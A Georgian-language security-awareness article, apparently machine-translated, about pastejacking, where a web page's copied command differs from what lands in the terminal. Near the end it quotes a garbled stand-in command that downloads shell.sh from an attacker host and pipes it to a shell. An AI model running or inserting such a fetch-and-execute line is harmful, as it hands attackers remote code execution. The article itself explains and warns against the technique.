- ჩვენ ყველანი ვაკოპირებთ და ვამაგრებთ ინტერნეტიდან ყოველდღიურად ისე, რომ რეალურად არ ვიცოდით რისკების შესახებ.
- უსაფრთხოების ექსპერტმა დრო დაუთმო, რათა ყველას ეჩვენებინა ყველაზე უარესი სცენარი ამის გაკეთებისას.
- ინტერნეტიდან მიღებული ბრძანებების თქვენს ტერმინალში ჩასმა არის სწრაფი გზა გატეხვისთვის
- ბრძანებები, რომლებსაც თქვენ ფიქრობდით, რომ ჩასვით თქვენს ტერმინალში, სინამდვილეში მავნე კოდებია.
მართალია, ჩვენ ვცხოვრობთ ეპოქაში, სადაც სიჩქარე ყველაფერია და სწრაფი შედეგების მიღება მთავარია. თუმცა, რამდენიმე ადამიანი რეალურად ჩერდება წამით და ფიქრობს შედეგებზე.
ყოველდღიურად, მილიონობით პროგრამისტი, ადმინისტრატორი და უსაფრთხოების მკვლევარი ასრულებენ მარტივ დავალებებს, როგორიცაა ვებ გვერდებიდან ბრძანებების კოპირება და ჩასმა პირდაპირ კონსოლებში თავიანთ კომპიუტერებზე.
მიუხედავად იმისა, რომ ბევრი არც კი ფიქრობს ამ საკითხზე, შედეგები უფრო დიდი და საშიშია, ვიდრე შეიძლება თავიდან იფიქროთ, განსაკუთრებით თუ ინახავთ მგრძნობიარე ან ღირებულ მონაცემებს.
უსაფრთხოების ცნობილმა ექსპერტმა დრო დაუთმო გასაზიარებლად რა შეიძლება მოხდეს რეალურად თუ თქვენ დააკოპირებთ+ჩასვით კონტენტს ვებ გვერდებიდან.
Copy+Paste არის მარტივი გზა რეალურად გატეხვისთვის
გაბრიელ ფრიდლანდერმა, რომელიც არის უსაფრთხოების ცნობიერების ამაღლების სასწავლო პლატფორმის Wizer-ის დამფუძნებელი, ამოიღო სქემა, რომელიც დაგაფიქრებთ ორჯერ, სანამ დააკოპირებთ და ჩასვამთ ბრძანებებს ვებ გვერდებიდან.
ინტერნეტიდან შიგთავსის კოპირება და ჩასმა იმდენად გავრცელებულია დღესდღეობით, რომ არავის აფიქრებინებს.
თუმცა, Friedlander აფრთხილებს, რომ ზოგიერთი ვებ გვერდი უფრო მატყუარაა, ვიდრე შეიძლება თავიდანვე წარმოვიდგინოთ, და ის, რაც ფიქრობთ, რომ დააკოპირეთ მისგან, ძალიან განსხვავდება იმისგან, რაც სინამდვილეში გააკეთეთ.
და ამ ყველაფრის უარესი ის არის, რომ საჭირო ცოდნისა და ხელმძღვანელობის გარეშე, მსხვერპლი მხოლოდ ტექსტის ჩასმის შემდეგ ხვდება თავის შეცდომას, რა დროსაც შეიძლება უკვე დაგვიანებული იყოს.
უსაფრთხოების ანალიტიკოსმა ასევე შეიმუშავა პატარა ტესტი თავისი ბლოგის მკითხველებისთვის, რათა ხალხმა რეალურად გაიგოს, რამდენად ადვილია თქვენთვის უნებლიეთ გააღოთ კარი კიბერკრიმინალებისთვის.
მან მოგვაწოდა ბრძანება, რომელიც განკუთვნილია კოპირებისთვის, მაგრამ ჭეშმარიტება მხოლოდ მაშინ ვლინდება, როდესაც ჩასვით ტექსტს და ხედავთ, რა შემოიტანეთ რეალურად თქვენს კონფიგურაციაში.
ზემოთ მოცემულ ეკრანის სურათზე ნაჩვენები ბრძანების კოპირების შემდეგ, მისი ჩასმის შედეგი გაგაოცებთ, რადგან ის შორს არის იმისგან, რასაც თქვენ ფიქრობდით, რომ დუბლირებთ.
დახვევა http://attacker-domain: 8000/shell.sh | შთქვენს ბუფერზე სრულიად განსხვავებული ბრძანების გარდა, ახალი ხაზის (ან დაბრუნების) სიმბოლოა მისი დასასრული ნიშნავს, რომ ზემოთ მოყვანილი მაგალითი შესრულდება, როგორც კი ის პირდაპირ Linux-ში იქნება ჩასმული ტერმინალი.
ასე რომ, სჯობს, უფრო მეტად იცოდეთ რა ხდება რეალურად და მოეპყროთ ამას, როგორც უსაფრთხოების სერიოზულ საფრთხეს. ჩვენ არ ვამბობთ, რომ ყველა ვებსაიტი მალავს მავნე შინაარსს, მაგრამ ამის გათვალისწინება ღირს.
გქონიათ ოდესმე გატეხილი ტერმინალში უსიამოვნო ბრძანებების ჩასმა? გაგვიზიარეთ თქვენი გამოცდილება ჩვენთან კომენტარების განყოფილებაში ქვემოთ.
